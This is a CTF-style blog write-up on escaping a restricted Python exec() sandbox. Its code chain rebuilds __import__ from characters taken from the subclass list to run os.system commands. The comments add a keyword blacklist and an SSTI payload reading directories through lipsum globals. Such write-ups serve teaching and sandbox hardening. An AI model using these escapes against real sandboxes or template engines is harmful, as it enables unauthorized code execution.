The Craziest Python Sandbox Escape

Several CTF Challenges involve Python Sandbox Escapes.

In essence, you're allowed to run a small piece of Python code, often being run by Pythons "exec" function which simply executes any code given to it.

With no restrictions, you can simply go:

>>> import os; os.system('whoami');
reelix

The "whoami" is simply a proof of concept. You can run any linux command from there, so you can alter files, create a reverse shell, and so on.

So they then limit the ability to use spaces so you can't do the import. You can bypass that by using one of Pythons builtin functions and going:

__import__('os').system('whoami');

So they then limit it further. No spaces, but now you're not allowed to use the words "import", "os", or "system" - Either Uppercase, or Lowercase. You can bypass that by converting the required words to strings, reversing them, and calling them directly, and go:

getattr(getattr(__builtins__,'__tropmi__'[::-1])('so'[::-1]),'metsys'[::-1])('whoami');

And that's about as far as most get. In a recent CTF however, I had all the above restrictions, but now no builtins (No __import__ or __builtins__), or quotes either!

Aside from the quote removal, the challenge was:

exec('Your Input Here', {'__builtins__': None, 'print':print});

Getting Letters

Python doesn't require the entire string to be together, so you can go:

>>> import os; os.system('who'+'am'+'i');
reelix

In addition, you can assign these to variables, so you can go:

>>> wordwhoami='w'+'ho'+'ami';import os;os.system(wordwhoami);
reelix

So, first, I needed some way to be able to get some letters.

If you run:

().__class__.__base__.__subclasses__();

It splits out every base class that Python3 has:

>>> ().__class__.__base__.__subclasses__();
[<class 'type'>, <class 'weakref'>, <class 'weakcallableproxy'>, <class 'weakproxy'>, <class 'int'>, <class 'bytearray'>, <class 'bytes'>, <class 'list'>, <class 'NoneType'>, <class 'NotImplementedType'>, <class 'traceback'>, <class 'super'>, <class 'range'>, <class 'dict'>, <class 'dict_keys'>, <class 'dict_values'>, <class 'dict_items'>, <class 'dict_reversekeyiterator'>, <class 'dict_reversevalueiterator'>, <class 'dict_reverseitemiterator'>, <class 'odict_iterator'>, <class 'set'>, <class 'str'>, <class 'slice'>, <class 'staticmethod'>, <class 'complex'>, <class 'float'>, <class 'frozenset'>, <class 'property'>, <class 'managedbuffer'>, <class 'memoryview'>, <class 'tuple'>, <class 'enumerate'>, <class 'reversed'>, <class 'stderrprinter'>, <class 'code'>, <class 'frame'>, <class 'builtin_function_or_method'>, <class 'method'>, <class 'function'>, <class 'mappingproxy'>, <class 'generator'>, <class 'getset_descriptor'>, <class 'wrapper_descriptor'>, <class 'method-wrapper'>, <class 'ellipsis'>, <class 'member_descriptor'>, <class 'types.SimpleNamespace'>, <class 'PyCapsule'>, <class 'longrange_iterator'>, <class 'cell'>, <class 'instancemethod'>, <class 'classmethod_descriptor'>, <class 'method_descriptor'>, <class 'callable_iterator'>, <class 'iterator'>, <class 'pickle.PickleBuffer'>, <class 'coroutine'>, <class 'coroutine_wrapper'>, <class 'InterpreterID'>, <class 'EncodingMap'>, <class 'fieldnameiterator'>, <class 'formatteriterator'>, <class 'BaseException'>, <class 'hamt'>, <class 'hamt_array_node'>, <class 'hamt_bitmap_node'>, <class 'hamt_collision_node'>, <class 'keys'>, <class 'values'>, <class 'items'>, <class 'Context'>, <class 'ContextVar'>, <class 'Token'>, <class 'Token.MISSING'>, <class 'moduledef'>, <class 'module'>, ......

Well, this list of classes has letters in it, right? So lets use those!

We can't just use these letters directly, as it's a list of objects and not a string, so we need to convert that list to a string to be able to get access to the individual characters.

Whilst we can't just use str like you normally would since str is one of the builtin classes that were stripped, that list of classes has <class 'str'> in it at position 22 - So let's use that instead!

>>> ().__class__.__base__.__subclasses__()[22](().__class__.__base__.__subclasses__());
"[<class 'type'>, <class 'weakref'>, <class 'weakcallableproxy'>, <class 'weakproxy'>, <class 'int'>, <class 'bytearray'>, <class 'bytes'>, <class 'list'>, <class 'NoneType'>, <class 'NotImplementedType'>, <class 'traceback'>, <class 'super'>, <class 'range'>, <class 'dict'>, <class 'dict_keys'>, <class 'dict_values'>, <class 'dict_items'>, <class 'dict_reversekeyiterator'>, <class 'dict_reversevalueiterator'>, <class 'dict_reverseitemiterator'>, <class 'odict_iterator'>, <class 'set'>, <class 'str'>, <class 'slice'>, <class 'staticmethod'>, <class 'complex'>, <class 'float'>, <class 'frozenset'>, <class 'property'>, <class 'managedbuffer'>, <class 'memoryview'>, <class 'tuple'>, <class 'enumerate'>, <class 'reversed'>, <class 'stderrprinter'>, <class 'code'>, <class 'frame'>, <class 'builtin_function_or_method'>, <class 'method'>, <class 'function'>, <class 'mappingproxy'>, <class 'generator'>, <class 'getset_descriptor'>, <class 'wrapper_descriptor'>, <class 'method-wrapper'>, <class 'ellipsis'>, <class 'member_descriptor'>, <class 'types.SimpleNamespace'>, <class 'PyCapsule'>, <class 'longrange_iterator'>, <class 'cell'>......

And, since it's now a string, we can simply use the positional index to pluck out specific characters!

We need an "o" and an "s" for "os". The "s" we can get from the word "class" at the start at index 5, and the "o" we can get from "NoneType" at index 164. So, to print "os" we can go:

>>> ().__class__.__base__.__subclasses__()[22](().__class__.__base__.__subclasses__())[164]+().__class__.__base__.__subclasses__()[22](().__class__.__base__.__subclasses__())[5];
'os'

Let's assign them some variables so it's easier to use them later.

>>> charo=().__class__.__base__.__subclasses__()[22](().__class__.__base__.__subclasses__())[164];
chars=().__class__.__base__.__subclasses__()[22](().__class__.__base__.__subclasses__())[5];
charo+chars;
'os'

Getting import back

Now I was stuck for awhile. I couldn't just any of the builtin classes since they were stripped, so I couldn't run __import__ to import the "os" I had just created - Now what!

After extensive searching, I came across this link showing that the base class "_frozen_importlib.BuiltinImporter" had a .load_module method that could get the builtins back!

Similar to how we used the "str" method to convert our original list to a string, we can call this method by its index in our base list (At position 84), and construct the text it required for the .load_module method from a list of indexed characters!

>>> charb=().__class__.__base__.__subclasses__()[22](().__class__.__base__.__subclasses__())[53];
>>> charu=().__class__.__base__.__subclasses__()[22](().__class__.__base__.__subclasses__())[235];
>>> chari=().__class__.__base__.__subclasses__()[22](().__class__.__base__.__subclasses__())[94];
>>> charl=().__class__.__base__.__subclasses__()[22](().__class__.__base__.__subclasses__())[51];
>>> chart=().__class__.__base__.__subclasses__()[22](().__class__.__base__.__subclasses__())[9];
>>> charn=().__class__.__base__.__subclasses__()[22](().__class__.__base__.__subclasses__())[95];
>>> chars=().__class__.__base__.__subclasses__()[22](().__class__.__base__.__subclasses__())[5];
>>> ().__class__.__bases__[0].__subclasses__()[84]().load_module(charb+charu+chari+charl+chart+chari+charn+chars).__import__;
<built-in function __import__>

And now we have our __import__ back! Hurrah!

Putting it all together

Now we just need to add the missing characters for the rest, neaten it up a bit, and we're done - Full code execution!

>>> charb=().__class__.__base__.__subclasses__()[22](().__class__.__base__.__subclasses__())[53];
>>> charu=().__class__.__base__.__subclasses__()[22](().__class__.__base__.__subclasses__())[235];
>>> chari=().__class__.__base__.__subclasses__()[22](().__class__.__base__.__subclasses__())[94];
>>> charl=().__class__.__base__.__subclasses__()[22](().__class__.__base__.__subclasses__())[51];
>>> chart=().__class__.__base__.__subclasses__()[22](().__class__.__base__.__subclasses__())[9];
>>> charn=().__class__.__base__.__subclasses__()[22](().__class__.__base__.__subclasses__())[95];
>>> chars=().__class__.__base__.__subclasses__()[22](().__class__.__base__.__subclasses__())[5];
>>> charo=().__class__.__base__.__subclasses__()[22](().__class__.__base__.__subclasses__())[164];
>>> charw=().__class__.__base__.__subclasses__()[22](().__class__.__base__.__subclasses__())[25];
>>> charh=().__class__.__base__.__subclasses__()[22](().__class__.__base__.__subclasses__())[540];
>>> chara=().__class__.__base__.__subclasses__()[22](().__class__.__base__.__subclasses__())[4];
>>> charm=().__class__.__base__.__subclasses__()[22](().__class__.__base__.__subclasses__())[187];
>>> bi=().__class__.__bases__[0].__subclasses__()[84]().load_module(charb+charu+chari+charl+chart+chari+charn+chars);
>>> bi.__import__(charo+chars).system(charw+charh+charo+chara+charm+chari);
reelix

6 comments :

UnknownApril 25, 2021 at 7:14 PM
this is just beautiful
UnknownApril 25, 2021 at 7:14 PM
wow can i ask which ctf was this challange in?
AnonymousJune 17, 2022 at 6:19 AM
how i can bypass if only alphabet and "_" allowed?
AnonymousJune 11, 2023 at 5:43 AM
thanks for the explanation
now how if it blacklists these ["\"", "'", "|", "[", "]", "class", "subclasses", "config", "url_for", "request", "builtins", "popen", "subprocess"]
how you bypass that i only manage to look the directory files with {{lipsum._globals_.os.listdir()}}

Reelix's Site of Stuff

Saturday, April 24, 2021

The Craziest Python Sandbox Escape

Getting Letters

Getting import back

Putting it all together

6 comments :

Saturday, April 24, 2021

The Craziest Python Sandbox Escape

Getting Letters

Getting __import__ back

Putting it all together

6 comments :

Getting import back